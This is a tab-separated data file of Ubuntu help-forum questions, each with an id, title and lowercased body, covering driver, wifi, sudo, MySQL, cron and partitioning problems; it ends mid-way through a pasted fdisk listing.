239372	what is the command to put the current window in half the screen	i want to put the current , active window on one side of the screen . then ideally i could put one window on the left half , and one window on the right half . on windows the keyboard shortcut ( the only method i know ) is the super + left arrow or super + right arrow to specify the left or right side of the screen . all help is greatly appreciated !
239373	how do i stop sushi from auto-playing videos when i hit space bar ?	i have precise 12.04 and use vlc 2.03 as my video player . my machine is mainly a media machine , so i 've pretty much always got vlc open , and it 's configured to have only one instance running -- doubleclick takes over the current video , but i can also right-click to enqueue to the playlist . anyhoo , sometimes when i have a video playing fullscreen and i hit spacebar to pause it , the context is still on nautilus so instead it launches the sushi preview window . i think this happens when i 've double clicked the file originally , launching full screen vlc , but never clicked away to change window focus . pretty annoying when i forget to click the video after launch , which is pretty much always . can i disable the video preview option somehow ? or at least the launch preview ; i dont ' want to loose having thumbnail previews thanks !
239375	correct drivers for amd radeonâ˘ hd 7650m	so , i have a sony vaio sve15118fg running ubuntu 12.10 which comes with an amd radeonâ˘ hd 7650m graphics chip . this was all working fine until some updates ( note sure what they were ) came through , after installing my laptop now no longer boots properly , specifically : upon attempting to boot the screen starts flicking violent striped horizontal lines . this can only be corrected via the power button . attempting to do anything in recovery - bar dropping to a root shell - runs fsck which ends up hanging ( although the system still responds there is no hdd activity ) . this is remedied via ctrl+alt+delete to restart the system . running fsck manually from the root shell completes successfully . i have attempted numerous things including removing all propriety drivers , trying the two installed propriety drivers , installing the latest beta driver from amd . etc . these all yeild various results , such as the same as above , or a gnome-fallback session , or a gnome-shell session with various flickers and graphical artifacts . so , i am wondering , what the heck do i have to do to get this to work ? ! ? i do n't really game , especially in ubuntu , so i just want a working system ! not fussed about 3d acceleration of whatever ...
239378	how can i connect to nexus 7 ( running ubuntu ) via ssh ?	i just installed ubuntu on my nexus 7 and works like a champ , but i ca n't connect via ssh/telnet/rsh from my laptop . i 've installed openssh-server , telnetd-ssl and rsh-server , but still ca n't . the connection is made , but it hangs after typing my password . $ ssh ubuntu @ 192.168.1.70 ubuntu @ 192.168.1.70 's password : i 'm running ubuntu raring 13.04 on a nexus 7 32gb thank you .
239385	skype not `` speaking '' to my speakers	i have skype version 4.1.0.20 on ubuntu 12.04 i have tested my webcam and video and audio are working . on skype my vid and audio work going out but i get no sound coming in . in the sound options my speakers are set to `` pulseaudio server ( local ) '' and there is no other option . when i watch the pulseaudio volume control display ( output devices ) i see that i am getting audio from skype but it 's not getting to my speakers . ? ? ? ? skype does make all the usual noises e.g . when someone is calling etc .
239386	is there an emulator or wine type environment that would allow use of android apps on linux ?	basically , i have a kindle fire that uses a form of the android os and was wondering if there was a way i could run similar apps on my ubuntu system . specifically i 'd like the news reader program `` pulse '' . anybody know if such an emulator or workaround exists ?
239387	compiz config effects having some problems on 12.10 ?	when i enable wobbly windows , the desktop does n't work right like on 12.04 . the workspace is glitchy when you grab a window and that is distorted when you do n't close the window . the right click also has the effect which i think is not suppose to . the close animation does not work right when you are using flash player like on a youtube video or other video based . i was changing the launcher opacity when i noticed the second problem . is there a way to update or fix these ?
239395	installing ubuntu on asus g75vw ( uefi )	i bought an asus g75vw . it has the new uefi bios instead of the old style bios ( 1980 's ) and has windows 8 preinstalled . i can not get the g75vw to install ubuntu 12.10 in efi mode . i did get ubuntu to load if i changed the bios to csm and the computer sees and installs ubuntu in `` legacy mode '' . i attempted boot repair , and ubuntu will load after 1 minute but as legacy bios only . if i changed the bios to uefi `` binary is whitelisted '' is displayed and i get a purple screen . i want to keep my preinstalled windows 8 on internal drive bay 1 and install ubuntu 12.10 on internal drive bay 2 , and have the option of booting either one in grub . i am a software programmer , but i am very bad at understanding bios and partitioning .
239398	how to continue the installation process after freeze ?	i have a pc with a mobo asus m5a99fx pro r2.0 , cpu amd fx-4100 , 2x4gb corsair vengence 1600 mhz , gc nvidia gt430 2gb . i tried so many times to install ubuntu in my pc , from 10.04 to 12.10 , in 32b or 64b from liveusb or livedvd ( i burned a lot of cds & dvds ) . after the setup shows me that i have 4gb free in the hdd and i have internet connection i press continue to begin the installation and nothing happens . the setup freeze and it happens no matter which version i use . can anyone help me ?
239403	is it possible to recover tomboy notes from ubuntu one , now that the sync feature is gone ?	recently , ubuntu one dropped its tomboy notes sync feature . is there any way to recover the notes that i 've synced with ubuntu one , now that the sync feature is gone ? i currently do n't have the notes synced with any of my computers , but i do n't want to lose all the notes that i 've synced over the last few years . http : //www.omgubuntu.co.uk/2012/02/ubuntu-one-notes-feature-written-off
239407	using terminal to open a file within a jar file ?	how can i open and see within a file within a jar file from within terminal ? i can use less to print out all the files within the jar file , but how can i open these files ?
239422	what is `` steam '' and how does it work ?	i 've heard steam is recently available for gnu/linux . a lot of people are talking about it . what is steam ? what 's the fuss all about ? is steam just for people who develop and play games ? what should i know about steam , as an user of ubuntu ? should i install steam ?
239425	desktop environment agnostic method for prompting the user for a password ?	in gnome , there is gksudo . in kde , there is kdesudo . is there a command that can be run on any desktop environment that will prompt the user for the root password and then run a command ?
239429	what 's the function of wget 's -o - ?	i see some linux page says how to install the key : wget http : //packages.ros.org/ros.key -o - | sudo apt-key add - what is `` -o - '' in wget ? it seems related with `` add - '' . how these works ? thank you~
239432	enable passwordless sudo as a specific user	i have two users on my system : itsadok , my main user , and elasticsearch , a user with a different ulimit for running elasticsearch . i would like to be able to run stuff as the secondary user without being prompted for password every time . i added the following line to /etc/sudoers : itsadok all= ( elasticsearch : elasticsearch ) nopasswd : all the way i understand it , this should allow the user itsadok , on any host , to run any command as ( user or group ) elasticsearch without a password . however , trying something like itsadok @ dev001 $ sudo -u elasticsearch ls prompts me for a password . restarting the machine did not help . what am i doing wrong ? update : it turns our that the order of lines in sudoers is significant . i placed the line under `` user privilege specification '' which sounded like the right place , but the line for the % admin group that comes later was overriding the setting . putting the same line at the end of the sudoers file fixed the issue .
239436	only hdmi soundcard listed , not onboard ( ideacenter q180 )	my ubuntu 12.10 system on lenovo ideacenter q180 sees only the hdmi soundcard , but not the onboard one . how can i fix this ? lshw output : audio device /0/100/1c.3/0.1 product : caicos hdmi audio [ radeon hd 6400 series ] [ 1002 : aa98 ] vendor : advanced micro devices [ amd ] nee ati [ 1002 ] bus info : pci @ 0000:04:00.1 version : 00 width : 64 bits clock : 33mhz capabilities : power management , pci express , message signalled interrupts , bus mastering , pci capabilities listing configuration : driver : snd_hda_intel latency : 0 resources : irq : 51 memory : d0040000-d0043fff aplay : sudo aplay -l **** list of playback hardware devices **** card 0 : generic [ hd-audio generic ] , device 3 : hdmi 0 [ hdmi 0 ] subdevices : 0/1 lspci : sudo lspci | grep aud 04:00.1 audio device : advanced micro devices [ amd ] nee ati caicos hdmi audio [ radeon hd 6400 series ] subdevice # 0 : subdevice # 0
239441	dynamically create xmllistmodel ?	is it possible to dynamically create xmllistmodel using a javascript function in a .qml file ? also , what can i execute qml file with so that i can get console.log ( ) to the command line ?
239442	getting this error while installing cinnamon in 11.10	traceback ( most recent call last ) : file `` /usr/bin/add-apt-repository '' , line 88 , in < module > ppa_info = get_ppa_info_from_lp ( user , ppa_name ) file `` /usr/lib/python2.7/dist-packages/softwareproperties/ppa.py '' , line 83 , in get_ppa_info_from_lp curl.perform ( ) pycurl.error : ( 35 , 'gnutls_handshake ( ) failed : a tls packet with unexpected length was received . ' ) can anyone tell me what is to be done ?
239449	why does my shell open many instances of itself ?	i 've been messing with the chsh command so that i could change the name displayed in my shell before each command is issued , for example picard @ ubuntu : $ . my problem arose when i gave the command chsh -s /bin/ksh picard , not fully knowing what the results would be . among this command , i also used grep ksh /etc/shells/ . now , any time i try to open a terminal , be it bash , dash , sh or urxvt , it either just does n't open or starts spawning instances of urxvt until it has so many open , the computer hangs and then the instances are all closed . what exactly did i screw up ? i really would prefer not having to reinstall , but i ca n't use linux without a command line , which i 'm sure you guys can sympathize with .
239450	nvidia 7800 gtx ( drivers not working for 12.04 )	i bought a used nvidia 7800 gtx card and plugged it in to the motherboard and then plugged the monitor into the the vga portion of a dvi to vga converter located in the back of the card . i booted up and got a 640x480 resolution . i then attempted to install the nvidia 304.37 driver . i now know that this driver has been updated to 304.64 . anyway , i installed the 304.37 driver , restarted the computer , the screen went white and black then dropped me to a command prompt . i have since uninstalled that driver , reinstalled 304.60 , 304.64 , and attempted a couple of others -- all of which were unsuccessful . the furthest i have been able to get thus far is the 'ubuntu ' picture showing when the operating system is loading . i have googled this for a while now and some other things i 've tried are sudo apt-get install nvidia-current nvidia-settings , sudo apt-get install nvidia-current-updates , sudo apt-get install nvidia-experimental-304 , searching the kernel log file for hints ( i read it could be an issue with nouveau but found nothing in the log files about noveau ) . i did find in the log files this : nvrm : your system is not currently configured to drive a vga console nvrm : on the primary vga device . the nvidia linux graphics driver nvrm : requires the use of a text-mode vga console . use of other console nvrm : drivers including , but not limited to , vesafb , may result in nvrm : corruption and stability problems , and is not supported . so me not being able to boot into the gui only happens when the monitor is plugged into the card . i 'm able to boot into the gui ( lightdm i believe ? ) when i have the monitor plugged into the on-board graphics though * however , i 'm only able to get 640x480 resolution now and that is the only resolution available to me * . my main concern is getting the video card to display the gui , after that i 'll work on the resolution problem . unless the resolution not displaying all the possible values is the problem . but i do n't know what the problem is , which is why i came here . so anyone who might know anything about this feel free to post some things to try . i 'm pretty new to linux and ubuntu so do n't rule out me not getting something obvious .
239453	video conversion using libav with libopus	i need to convert my video files with vp8 / opus in matroska ( mkv ) container using avconv in terminal can anyone give example usage of it ?
239455	how do i stop /var/log/kern.log.1 from consuming all my disk space ?	i have a 80 gb hdd without any partitions . one day i realised that i have lost most of my free disk space . i discovered that /var/log/kern.log.1 takes up 25 gb of space and there is no delete option for that file . here is a screenshot of the problem . https : //docs.google.com/open ? id=0b39n7lgxqwciz09awfvbcklrwwc i am new to ubuntu/linux . please help . thank you .
239456	how to enable zeitgeist logging for emacs on ubuntu 12.04	i would like the files i open in emacs to show up in the dash under the files lens . as far as i understand zeitgeist is doing the work , but i ca n't seem to find the emacs zeitgeist data provider that was available for 11.04 .
239459	nvidia driver not working on dell precision m6500	so i have tried the steps outlined in this article nvidia driver does n't work in 12.10 but still to no avail . my screen normally pops up as just whatâs on the desktop and the mouse , the only way to get out of it is to either uninstall the nvidia driver or change it back to the original graphics driver . i do get an error that says `` plymouth unmounted '' or something like that when it loads up . this is my first time ever using ubuntu ( i have 12.10 installed ) so any help would be appreciated .
239460	how to search for wireless networks ?	i 'm using ubuntu 12.04 . i tried with this sudo iwlist eth0 scan but this does n't seem to work : ( ..it says `` interface dos n't support scanning '' what to do ? please help.. i ca n't access internet on ubuntu . even i 've mobile broadband usb , but even that does n't get detected . other pendrives get detected more details *-network unclaimed description : network controller product : broadcom corporation vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:08:00.0 version : 01 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : latency=0 resources : memory : c1500000-c1507fff and more details : lspci 00:00.0 host bridge : intel corporation ivy bridge dram controller ( rev 09 ) 00:01.0 pci bridge : intel corporation ivy bridge pci express root port ( rev 09 ) 00:02.0 vga compatible controller : intel corporation ivy bridge graphics controller ( rev 09 ) 00:14.0 usb controller : intel corporation panther point usb xhci host controller ( rev 04 ) 00:16.0 communication controller : intel corporation panther point mei controller # 1 ( rev 04 ) 00:1a.0 usb controller : intel corporation panther point usb enhanced host controller # 2 ( rev 04 ) 00:1b.0 audio device : intel corporation panther point high definition audio controller ( rev 04 ) 00:1c.0 pci bridge : intel corporation panther point pci express root port 1 ( rev c4 ) 00:1c.1 pci bridge : intel corporation panther point pci express root port 2 ( rev c4 ) 00:1d.0 usb controller : intel corporation panther point usb enhanced host controller # 1 ( rev 04 ) 00:1f.0 isa bridge : intel corporation panther point lpc controller ( rev 04 ) 00:1f.2 sata controller : intel corporation panther point 6 port sata controller [ ahci mode ] ( rev 04 ) 00:1f.3 smbus : intel corporation panther point smbus controller ( rev 04 ) 01:00.0 vga compatible controller : advanced micro devices [ amd ] nee ati thames xt/gl [ radeon hd 7600m series ] 07:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8101e/rtl8102e pci express fast ethernet controller ( rev 05 ) 08:00.0 network controller : broadcom corporation device 4365 ( rev 01 )
239461	how to make a textbox update brightness level ?	i 'm using awesome window manager and have a textbox widget that i want to update with the current brightness level on an arbitrary interval of my choosing . is there anyway to do this with awesome and if so , how ?
239462	how can i restore default keyboard shortcuts in 12.10 ?	this question has been asked already , but it does n't seem to apply to ubuntu 12.10 . the file formats of /usr/share/gnome-control-center/keybindings/ has changed . i tried the script someone kindly provided ... cd /usr/share/gnome-control-center/keybindings for entry in $ ( grep keylistentry * |cut -d'/ ' -f2- |cut -d ' '' ' -f1 ) ; do echo $ entry gconftool -u `` / $ entry '' done but it returns ... error unsetting '/keylistentry > ' : bad key or directory name : `` /keylistentry > '' : ' > ' is an invalid character in key/directory names ... for every entry . i changed a few of the keyboard shortcuts thinking it would only apply to my bluetooth keyboard , but i was wrong . how can i go about resetting them in ubuntu 12.10 ? some items like , monitor brightness down , do not appear in keyboard settings 'shortcuts ' , which is why i am looking for a reset .
239463	why does network manager automatically choose wep over wpa & wpa2 ?	i am on ubuntu 12.10 and for some reason my wireless connection is using wep when it is set to use wpa/wpa2 personal . also i should mention that i used to be on 12.04 and was experiencing the wireless connection automatically creating a different wireless connection profile that used wep . it showed up as siddhion1 and i would always have to deleted it from my network connections list . so it seems that this problem has migrated to 12.10 maybe because i upgraded and did not do a fresh install ? anyways , as you can see from the following screen shot of my network connection `` siddhion '' , its security is set to wpa & wpa2 personal . when siddhion is automatically connected to the network window shows that siddhion 's security is in fact wep ( shown in the following screenshot ) obviously this is a big concern since wep has poor security . i ran a following diagnostics commands to get the following results . hwinfo -- netcard max @ siddhion : ~ $ hwinfo -- netcard > hal.1 : read hal dataprocess 29274 : arguments to dbus_move_error ( ) were incorrect , assertion `` ( dest ) == null || ! dbus_error_is_set ( ( dest ) ) '' failed in file ../../dbus/dbus-errors.c line 282 . this is normally a bug in some application using the d-bus library . libhal.c 3483 : error unsubscribing to signals , error=the name org.freedesktop.hal was not provided by any .service files 26 : pci 200.0 : 0282 wlan controller [ created at pci.318 ] unique id : y9sn.rel4kyuruv5 parent id : z8q3.1xiyahito_c sysfs id : /devices/pci0000:00/0000:00:1c.0/0000:02:00.0 sysfs busid : 0000:02:00.0 hardware class : network model : `` intel wireless wifi link 5100 '' vendor : pci 0x8086 `` intel corporation '' device : pci 0x4232 `` wireless wifi link 5100 '' subvendor : pci 0x8086 `` intel corporation '' subdevice : pci 0x1201 driver : `` iwlwifi '' driver modules : `` iwlwifi '' device file : wlan0 features : wlan memory range : 0xc0000000-0xc0001fff ( rw , non-prefetchable ) irq : 45 ( 1214675 events ) hw address : 00:22 : fa:2c:3d:4c link detected : yes wlan channels : 1 2 3 4 5 6 7 8 9 10 11 12 13 36 40 44 48 52 56 60 64 100 104 108 112 116 120 124 128 132 136 140 wlan frequencies : 2.412 2.417 2.422 2.427 2.432 2.437 2.442 2.447 2.452 2.457 2.462 2.467 2.472 5.18 5.2 5.22 5.24 5.26 5.28 5.3 5.32 5.5 5.52 5.54 5.56 5.58 5.6 5.62 5.64 5.66 5.68 5.7 wlan encryption modes : wep40 wep104 tkip ccmp wlan authentication modes : open sharedkey wpa-psk wpa-eap module alias : `` pci : v00008086d00004232sv00008086sd00001201bc02sc80i00 '' driver info # 0 : driver status : iwlwifi is active driver activation cmd : `` modprobe iwlwifi '' config status : cfg=new , avail=yes , need=no , active=unknown attached to : # 15 ( pci bridge ) 27 : pci 300.0 : 0200 ethernet controller [ created at pci.318 ] unique id : rbuf.5jtq7ecspw3 parent id : qtvu.3mbs8qxtrld sysfs id : /devices/pci0000:00/0000:00:1c.1/0000:03:00.0 sysfs busid : 0000:03:00.0 hardware class : network model : `` marvell 88e8040 pci-e fast ethernet controller '' vendor : pci 0x11ab `` marvell technology group ltd. '' device : pci 0x4355 `` 88e8040 pci-e fast ethernet controller '' subvendor : pci 0x1179 `` toshiba america info systems '' subdevice : pci 0xff50 revision : 0x12 driver : `` sky2 '' driver modules : `` sky2 '' device file : eth0 memory range : 0xc0500000-0xc0503fff ( rw , non-prefetchable ) i/o ports : 0x3000-0x3fff ( rw ) irq : 44 ( 1 event ) hw address : 00:23:8b:80:9a:2c link detected : no module alias : `` pci : v000011abd00004355sv00001179sd0000ff50bc02sc00i00 '' driver info # 0 : driver status : sky2 is active driver activation cmd : `` modprobe sky2 '' config status : cfg=new , avail=yes , need=no , active=unknown attached to : # 16 ( pci bridge ) iwconfig max @ siddhion : ~ $ iwconfig eth0 no wireless extensions . lo no wireless extensions . wlan0 ieee 802.11abgn essid : '' siddhion '' mode : managed frequency:2.462 ghz access point : 00 : aa : aa:10:12 : eb bit rate=11 mb/s tx-power=15 dbm retry long limit:7 rts thr : off fragment thr : off power management : off link quality=70/70 signal level=-31 dbm rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:0 invalid misc:184 missed beacon:0 sudo iwlist wlan0 scan max @ siddhion : ~ $ sudo iwlist wlan0 scan wlan0 scan completed : cell 01 - address : 00 : aa : aa:10:12 : eb channel:11 frequency:2.462 ghz ( channel 11 ) quality=70/70 signal level=-35 dbm encryption key : on essid : '' siddhion '' bit rates:1 mb/s ; 2 mb/s ; 5.5 mb/s ; 11 mb/s mode : master extra : tsf=00000000a95b3e1b extra : last beacon : 56ms ago ie : unknown : 00085369646468696f6e ie : unknown : 010482848b96 ie : unknown : 03010b ie : ieee 802.11i/wpa2 version 1 group cipher : ccmp pairwise ciphers ( 1 ) : ccmp authentication suites ( 1 ) : psk ie : unknown : dd0700e04c01020300 additionally i ran wpa_gui to see if wpa was being recognized and the status message i see is could not get status from wpa_supplicant as shown in the following snap shot does anyone have an idea on how i can make ubuntu use only wpa & wpa2 security ?
239466	how can i connect to microsoft direct access ?	my company has moved from cisco vpn to microsoft direct access . i was using network-manager-vpnc to connect from ubuntu before . can i use the same to connect to direct access ? if not , how can i connect to direct access from ubuntu ( 12.04 ) ?
239469	greenpacket uh235 / mediatek mt7118 wimax modem	i have a greenpacket usb wimax modem that works in windows but not in ubuntu 12.04.searched google but am yet to see a solution . the modem uses mediatek chipset . has anybody been able to find a solution for this please ?
239478	power on does not work when display is closed	having a samsung n230 storm netbook runnning ubuntu 12.04 as i want to use only external devices ( vga display , usb keyboard , usb mouse ) and have the netbook acting as a `` desktop '' most of the time , i have the display closed . when hitting the `` on button '' ( even so its more a switch that i have to move slightly ) nothing happens . the system is not powering up . as i was running windows 7 starter before moving to ubuntu with the same hardware being plugged and it was working ( and i have not changed anything in the bios ) i must assume , that it is a setting within ubuntu that i got wrong . any ideas ? thanks in advance !
239488	cron works , but scheduled job to open webpage in chrome does not	updates start a friend of mine just answered this . i need to do this export display=:0 & & < my gui dependent command here > waiting for him to post the answer here . i have tried /opt/google/chrome/chrome particular_google_doc_url & without the & too . still fails . succeeds directly on command line . there is no /var/log/cron file on my machine . subsidiary question : how can i get it ? updates end i have a google doc that i need to update at regular intervals multiple times a day . the content that would form a particular update can not be predicted or determined programatically . so , the best solution i have is to have the particular google doc page open up automatically at fixed intervals and then i manually add the data to it . now , the problem is that what works directly on the command line does not work when used in crontab . below is what i have tried ( using 2mins interval just for testing ) - */2 * * * * date > > /tmp/crontest */2 * * * * /opt/google/chrome/chrome particular_google_doc_url & if i cat /tmp/crontest , i see timestamps added there for every 2nd minute if i just try /opt/google/chrome/chrome particular_google_doc_url on the shell , it works as expected but particular_google_doc_url does not get opened in my chrome every 2nd min as it should . ( again : i am using 2mins interval just for testing ) what am i doing wrong ? how should i fix this ? any alternate way of achieving what i need done ? thanks in advance .
239489	how do i connect to asterisk server located in windows 7 virtualbox ?	i have ms windows 7 . in that i installed virtualbox and in that i installed ubuntu . in ubuntu , i installed the asterisk server . how can i connect to asterisk server with windows 7 applications ? no i added any external ip , defaultly the virtualbox generating ip address , in virtualbox you try commnd ifconfig/ipconfig then you find it
239490	how can i get started with developing apps for ubuntu touch ?	i am interested in trying the new ubuntu for phones os development . ( i am not an ubuntu developer , i am new to ubuntu . impressed by the ubuntu touch preview , i got interested in learning how to develop for it ) . where can i start with it ? i ca n't find any guidance on the ubuntu site .
239503	how to log in after logout in l/ubuntu live persistent usb ?	i have created a persistent live usb of lubuntu 12.10 on a 16 gb flash pendrive with a 4gb space for persistency . it basically works like an installation , as new programs can be installed and new settings and customizations added and remembered . except that the username in terminal is lubuntu and at boot/startup am not asked for a password and the system starts without passing through the logging stage . but there is a problem if one ( e.g . in order to initiate certains settings ) is logging out instead of restarting/rebooting : the logging screen appears and contains initially no name and no space for password , and there 's no login button : but if i click or press enter the name of user is `` other '' and space for pass and login button appear . the name of the user can not be changed ( i guess there 's no real user registered ) and login does n't work without password entered . also , the passwords `` ubuntu '' or `` lubuntu '' are reported as incorrect . is there a way of using logout-and-in or should this be avoided ?
239505	how to deal with mysql error 1133 ( 42000 ) : ca n't find any matching row in the user table ?	i am constantly get the following error message : 1045 can not log in to the mysql server i have tried the following : sudo service mysql stop ( went fine ) sudo /usr/sbin/mysqld -- skip-grant-tables -- skip-networking & ( went fine ) mysql -u root ( went fine ) flush privileges ; ( went fine ) set password for root @ 'localhost ' = password ( 'password ' ) ; ( i get the following error : ) error 1133 ( 42000 ) : ca n't find any matching row in the user table mysql > select user from mysql.user ; + -- -- -- -- -- -- -- -- -- + | user | + -- -- -- -- -- -- -- -- -- + | linux | | root | | debian-sys-maint | + -- -- -- -- -- -- -- -- -- + 3 rows in set ( 0.00 sec )
239506	permission denied error while copying ?	i am trying to copy a file from my download directory to my desktop directory ; but i am getting the permission denied error . directory and file permissions does n't restrict me from copying ( directory perm : 755 , file perm : - 664 ) . sockets @ ankit : ~ $ ls -ld d desktop/ documents/ downloads/ sockets @ ankit : ~ $ ls -ld downloads/ desktop/ drwxr-xr-x 9 sockets sockets 4096 jan 4 12:52 desktop/ drwxr-xr-x 3 sockets sockets 4096 jan 10 16:24 downloads/ sockets @ ankit : ~ $ ls -l downloads/ankit.pdf -rw-rw-r -- 1 sockets sockets 96170 jan 10 16:24 downloads/ankit.pdf sockets @ ankit : ~ $ cp downloads/ankit.pdf desktop/ankit.pdf cp : can not create regular file `desktop/ankit.pdf ' : permission denied any ideas why i would be getting the permission error . i know i can use sudo to copy the file . -- -- -- -- -- edit -1 sockets @ ankit : /var/log $ df -i filesystem inodes iused ifree iuse % mounted on /dev/sda1 2501856 228878 2272978 10 % / udev 755379 510 754869 1 % /dev tmpfs 757578 431 757147 1 % /run none 757578 3 757575 1 % /run/lock none 757578 8 757570 1 % /run/shm /dev/sda6 27639808 37521 27602287 1 % /home/mount -- -- -- -- -- edit 2 sockets @ ankit : ~ $ df -h | grep /dev/sd /dev/sda1 38g 8.5g 28g 24 % / /dev/sda6 416g 87g 308g 22 % /home/mount /dev/sdc1 16g 2.1g 14g 14 % /media/new volume sockets @ ankit : ~ $ mount | grep /dev/sd /dev/sda1 on / type ext4 ( rw , errors=remount-ro ) /dev/sda6 on /home/mount type ext4 ( rw ) /dev/sdc1 on /media/new volume type vfat ( rw , nosuid , nodev , uid=1000 , gid=1000 , shortname=mixed , dmask=0077 , utf8=1 , showexec , flush , uhelper=udisks )
239507	looking for ide compiler to build and run a .c source file without creating a project	i have ubuntu 12.04 and kde . i already know code : :blocks that does the job , but i have a problem with it : any version of it ( 12.11 or 10.05 ) i use does n't close when i click the close button and if i try to make any change to editor setting it 's not saved . so i 'm looking for a ide compiler for c programs that does the same job with c source file . i need it for university , my teacher uses dev-c++ for windows but i have ubuntu and i need something similar to open a .c source and build and run it as faster as i can . if there are no ide like codeblocks maybe something like eclipse , netbeans , codelite etc ... have a plugin to build a .c source without making a project i do n't know . please help thanks
239508	how do i recover my ( potentially ) ruined ( 600+gb ) windows installation ?	i was installing xubuntu onto the same hard disk that my huge installation of windows was on and i accidentally pressed `` okay '' after i chose to do my own partitioning . the last thing i saw before i did a hard shutdown was something about ext4 partition tables . is there a way to fix my ( 600+ gb ) windows 7 install to booting again so i do n't have to redownload and reinstall all my stuff ? i just booted the live usb i screwed my intallation with and it lists the windows 7 partition as `` xubuntu '' . `` xubuntu '' has a filesystem called `` lvm2 pv '' . am i screwed or can i change it back to whatever windows uses without losing data ?
239515	why does my wifi get continuously connected/disconnected ?	i have just installed ubuntu 12.10 on my pc lenovo b570e . i have wifi connection in my room . it continuously connects and disconnects . what should i do ?
239518	my printer works normally except for when printing from a browser , how can i fix this ?	i have a hp b210 printer and i 've installed the driver directly from hp . the printer works very well from the apps , writer , impress , etc . - but i can not print directly from my browser ( firefox ) . when i go to check the documents ' status it 's says processing but nothing happens . i 've printed the test page and everything is working perfectly . the only one thing that i can not do is print directly from my browser . can anybody help me please ?
239531	installation canon pixma mp 230	when installing scangear ( using scangearmp-mp230series2.0-1-deb ) for canon pixma mp230 it stops with error : dependency is not satisfiable : scangearmp-common ( > = 2.00 ) , and scanimage -l responds no scanners were identified . if you were expecting something different , check that the scanner is plugged in , turned on and detected by the sane-find-scanner tool ( if appropriate ) . please read the documentation which came with this software ( readme , faq , manpages ) .
239533	identical default gateway with different metric ( 0 and 100 ) ubuntu 12.04 desktop	i have recently started to configure my network using /etc/network/interfaces for a static ip address . for this i have added the following lines into the file : auto lo iface lo inet loopback auto eth0 iface eth0 inet static address 192.168.0.232 netmask 255.255.255.0 gateway 192.168.0.1 dns-nameservers 8.8.8.8 8.8.4.4 i have also changed managed=true in /etc/networkmanager/networkmanager.conf . everything works fine so far . today i realized that i have two identical default gateways ( via a bash default gateway failover bash script that would n't work because of that reason ) . route shows the following : kernel ip routing table destination gateway genmask flags metric ref use iface default 192.168.0.1 0.0.0.0 ug 0 0 0 eth0 default 192.168.0.1 0.0.0.0 ug 100 0 0 eth0 link-local * 255.255.0.0 u 1000 0 0 eth0 192.168.0.0 * 255.255.255.0 u 0 0 0 eth0 the default gateway 192.168.0.1 shows up twice , once with metric 0 and once with 100 . is this the way it is supposed to be ? there are no files in /etc/networkmanager/system-connections so i have no idea where that gateway is coming from . i do n't have any scripts running that would add the gateway . how do i remove one of them so it 's gone permanently ?
239535	how to use single-thread script to do batch processing ?	i have a single-thread python script that gets used like this : python -c `` arg '' i also have a *.txt file with many arg , each in one single line in the respective *.txt . a text file , say 1.txt looks as follows : arg1 arg2 arg3 arg4 now i want to run the python script with all this arguments , one by one as the script does not allow more than one argument . how can i process this arguments in batch mode using commandline ?
239536	how to enable scrolling in virtual machine ?	i am using a virtual machine in vmware player 5.01 of ubuntu 12.04 without a graphical interface and i do n't have scroll enabled is there any way to enable it ? or to use something like a key combo to scroll up and down : )
239539	enabling wireless hardware in ubuntu	issue enabling the wireless in ubuntu : hardware details : 10:00.0 network controller [ 0280 ] : broadcom corporation bcm4311 802.11a/b/g [ 14e4:4312 ] ( rev 02 ) 18:00.0 ethernet controller [ 0200 ] : broadcom corporation netlink bcm5787m gigabit ethernet pci express [ 14e4:1693 ] ( rev 02 )
239543	get the default firefox profile directory from bash	i 'm trying to get the profile directory of the default firefox profile ( the one that opens automatically ) from bash . how could i proceed ? i ca n't find any useful options issuing firefox -- help
239546	how to reinstall the compiz on ubuntu	i seems like i have messed up something with my ubuntu compiz and i am not able to do anything in either gnome with effects environment not with unity environments with effect , the environment for both gnome and unity without effects work fine , but still i need to fix so that i can use the one with environment with effects , what should i do ? also does it has to do something with my display drivers ? i have nvidia graphics card
239553	ubuntu 12.04.1 installation problems ( boot-up/partition )	after windows cleanup , defrag and creating a partition of unallocated free space from c : drive ; started out with 3 partitions : windows storage 200mb windows os 162gb windows recovery 13gb with about 131gb unallocated free space inside of ubuntu 12.04.1 installer ( 32-bit , though installed on a 64-bit system ) â booted through a usb stick : deleted windows recovery partition to free up an extra partition ; unallocated free space up to about 145gb added partition of 30gb for ubuntu ext 4 / mount added partition of 8gb for linux swap added remainder ( ~107 gb ) into final partition for storage at /home mount ( started out with fat32 ) tried to continue installation â denied because : the file system type fat32 can not be mounted on /home , because it is not a fully-functional unix file system . please choose a different file system , such as ext2 . thus , i switched to ext4 for the /home mount storage partition , hoping that i could change it later with gparted or find some other work-around to enable me to share my folders ( docs , music , photos , etc . ) between windows 7 and ubuntu 12.04.1 . the installation proceeded , yet never asked which partition i wanted to choose to place ubuntu within . upon conclusion of install , it auto-rebooted only to have the system freeze up . i forced shut down and manually booted . instead of giving me the windows 7/ubuntu option , it first booted directly into ubuntu . next , i loaded and ran boot repair , which informed me that the problem was now resolved . what that provided ( after reboot ) was the purple grub screen with a ubuntu boot option at the top and a windows 7 boot option several options down . this does work , but it is not the setup that i have seen ( when i test ran ubuntu through wubi ) that showed a one or other choice ( ubuntu or windows ) in a more attractive 2-option layout screen ( prior to the grub screen ) . questions : how do i know if ubuntu was installed in the appropriate directory ? is it installed in sda3 ? also , as it appears ( to me anyway ) , it looks as though my sda4 ( that was to be my storage /home mount partition ) is now an extended partition with the swap ( in sda5 ) and the /home mount partition for file storage/sharing ( in sda6 ) . is this correct for my needs ? essentially , i would like : the boot option to be in the concise choice ( b/w ) screen prior to loading through grub ( is it possible to edit grub to achieve this objective ? ) , and my partition structure to be correct to enable a work-around for file sharing ( windows/ubuntu ) through a common storage partition ( if incorrect for my needs , is it possible to edit within gparted ? ) . listed below please find my fdisk and parted terminal information : john @ john-hp-g71-notebook-pc : ~ $ sudo fdisk -l [ sudo ] password for john : disk /dev/sda : 320.1 gb , 320072933376 bytes 255 heads , 63 sectors/track , 38913 cylinders , total 625142448 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x8d769ec6 device boot start end blocks id system /dev/sda1 * 2048 409599 203776 7 hpfs/ntfs/exfat /dev/sda2 409600 341301247 170445824 7 